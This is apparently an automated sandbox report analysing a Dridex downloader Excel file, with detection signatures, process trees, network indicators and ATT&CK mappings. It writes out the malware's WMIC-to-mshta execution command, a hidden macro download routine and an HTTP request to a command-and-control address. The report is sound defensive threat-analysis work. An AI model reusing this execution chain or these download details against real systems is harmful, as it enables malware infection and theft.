Loading ...

Play interactive tourEdit tour

Windows Analysis Report BookingXConfirm-11401.xlsb

Overview

General Information

Sample Name:BookingXConfirm-11401.xlsb
Analysis ID:528391
MD5:6b7bad3cea00c7bc8af7e7d0143c5928
SHA1:8c8c8bfe0d0f61dec2a2083488ff709555b79f0a
SHA256:2131544f0cfa54af9bdd61cd990af05f1a4483df67d6e6d76ece14cb9cc550f6
Tags:xlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Dridex Downloader
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Suspicious WMI Execution
Internet Provider seen in connection with other malware
IP address seen in connection with other malware
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2980 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 252 cmdline: wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 2808 cmdline: mshta C:\\ProgramData\BnnsIhc.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\BnnsIhc.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' , CommandLine: wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' , CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2980, ProcessCommandLine: wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' , ProcessId: 252
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' , CommandLine: wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' , CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2980, ProcessCommandLine: wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' , ProcessId: 252

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: BookingXConfirm-11401.xlsbVirustotal: Detection: 38%Perma Link
      Source: BookingXConfirm-11401.xlsbMetadefender: Detection: 14%Perma Link
      Source: BookingXConfirm-11401.xlsbReversingLabs: Detection: 40%
      Multi AV Scanner detection for domain / URLShow sources
      Source: http://103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YAVirustotal: Detection: 5%Perma Link
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.117.180.99:8080
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.117.180.99:8080

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2034532 ET TROJAN Dridex CnC Request - Spam/Worm Component 192.168.2.22:49167 -> 103.117.180.99:8080
      Source: Joe Sandbox ViewASN Name: CTRLS-AS-INCtrlSDatacentersLtdIN CTRLS-AS-INCtrlSDatacentersLtdIN
      Source: Joe Sandbox ViewIP Address: 103.117.180.99 103.117.180.99
      Source: global trafficHTTP traffic detected: GET /PJ3ZQWVJPYCYDCA9A6Q2Y6YA HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.117.180.99:8080Connection: Keep-Alive
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.117.180.99:8080
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Thu, 25 Nov 2021 07:05:55 GMTContent-Type: text/plain; charset=utf-8Connection: keep-aliveContent-Length: 9Data Raw: 4e 6f 74 20 46 6f 75 6e 64 Data Ascii: Not Found
      Source: unknownTCP traffic detected without corresponding DNS query: 103.117.180.99
      Source: unknownTCP traffic detected without corresponding DNS query: 103.117.180.99
      Source: unknownTCP traffic detected without corresponding DNS query: 103.117.180.99
      Source: unknownTCP traffic detected without corresponding DNS query: 103.117.180.99
      Source: unknownTCP traffic detected without corresponding DNS query: 103.117.180.99
      Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: sheet1.binString found in binary or memory: http://103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
      Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000006.00000002.662770451.0000000003B40000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.450898663.0000000001C80000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000006.00000002.662770451.0000000003B40000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B01B891.pngJump to behavior
      Source: global trafficHTTP traffic detected: GET /PJ3ZQWVJPYCYDCA9A6Q2Y6YA HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.117.180.99:8080Connection: Keep-Alive
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\BnnsIhc.rtf, type: DROPPED

      System Summary:

      barindex
      Found malicious Excel 4.0 MacroShow sources
      Source: BookingXConfirm-11401.xlsbMacro extractor: Sheet: Macro1 contains: URLDownloadToFileA
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: BookingXConfirm-11401.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: BookingXConfirm-11401.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000002.00000002.450787348.0000000000290000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' C:\Windows\System32\Wbem\wmic.exeWinSta0\DefaultSg
      Source: BookingXConfirm-11401.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: BookingXConfirm-11401.xlsbVirustotal: Detection: 38%
      Source: BookingXConfirm-11401.xlsbMetadefender: Detection: 14%
      Source: BookingXConfirm-11401.xlsbReversingLabs: Detection: 40%
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf'
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\\ProgramData\BnnsIhc.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic.exe process call create 'mshta C:\\ProgramData\BnnsIhc.rtf' Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$BookingXConfirm-11401.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCF3F.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@4/4@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: BookingXConfirm-11401.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: BookingXConfirm-11401.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: BookingXConfirm-11401.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: unknownProcess created: cmd line: bnnsihc.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: bnnsihc.rtfJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 2036Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 2064Thread sleep time: -60000s >= -30000sJump to behavior
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000006.00000002.661999246.0000000001120000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000006.00000002.661999246.0000000001120000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: mshta.exe, 00000006.00000002.661999246.0000000001120000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution32Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting3NTDSSystem Information Discovery5Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      BookingXConfirm-11401.xlsb39%VirustotalBrowse
      BookingXConfirm-11401.xlsb14%MetadefenderBrowse
      BookingXConfirm-11401.xlsb40%ReversingLabsDocument-Excel.Infostealer.Dridex

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA5%VirustotalBrowse
      http://103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YAtrue
      • 5%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.commshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtmshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000006.00000002.662770451.0000000003B40000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.mshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000006.00000002.662770451.0000000003B40000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000006.00000002.662528084.0000000003947000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oemshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.450898663.0000000001C80000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/mshta.exe, 00000006.00000002.662353403.0000000003760000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    103.117.180.99
                    unknownIndia
                    18229CTRLS-AS-INCtrlSDatacentersLtdINtrue

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528391
                    Start date:25.11.2021
                    Start time:08:04:45
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 4s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:BookingXConfirm-11401.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winXLSB@4/4@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    08:06:38API Interceptor12x Sleep call for process: WMIC.exe modified
                    08:06:39API Interceptor440x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    103.117.180.9906799.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    06799.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Rooms_requirement.7149.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Rooms_requirement.7149.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Rooms_requirement 17757.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Rooms_requirement 17757.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Booking Confirm 25423.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Booking Confirm 25423.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Booking Confirm-28473.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Booking Confirm-28473.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Venue_Booking-30959.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Venue_Booking-30959.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Venue_Booking 29285.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Venue_Booking 29285.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Confirm 8709.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Confirm 8709.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Booking-21678.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Booking-21678.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Confirm-27771.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA
                    Confirm-27771.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99:8080/PJ3ZQWVJPYCYDCA9A6Q2Y6YA

                    Domains

                    No context

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    CTRLS-AS-INCtrlSDatacentersLtdIN06799.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    06799.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Rooms_requirement.7149.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Rooms_requirement.7149.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Rooms_requirement 17757.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Rooms_requirement 17757.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Booking Confirm 25423.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Booking Confirm 25423.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Booking Confirm-28473.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Booking Confirm-28473.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Venue_Booking-30959.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Venue_Booking-30959.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Venue_Booking 29285.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Venue_Booking 29285.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Confirm 8709.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Confirm 8709.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Booking-21678.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Booking-21678.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Confirm-27771.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99
                    Confirm-27771.xlsbGet hashmaliciousBrowse
                    • 103.117.180.99

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\ProgramData\BnnsIhc.rtf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                    Category:dropped
                    Size (bytes):4914
                    Entropy (8bit):4.88997471368032
                    Encrypted:false
                    SSDEEP:96:QgoFzHLtH0DUj5JngLQD/adMzF/wt2TYy/PtHR8ltlwMAuu9rG+NM:FodtHSUj5dTL8MNUlUn9zS
                    MD5:4E2673E4557E92F3390F02FE9BC67DAC
                    SHA1:0192C1EF96F601E02CD3BE5E6FBBD915075121F3
                    SHA-256:3A5156A2D68D22BA527C5571720B2EF9DAE1716DA740E0CEDCA9EAF5724052ED
                    SHA-512:66BCC009FCE1228CF5D9B44206FA33F899A66AD8DCF206307FDD065D906AE28D1BCE6292B2D5BF05BB9CDCDCD46F2A0370A0CF6F8A275FF2CF1ED72916A8DE49
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\BnnsIhc.rtf, Author: Joe Security
                    Reputation:low
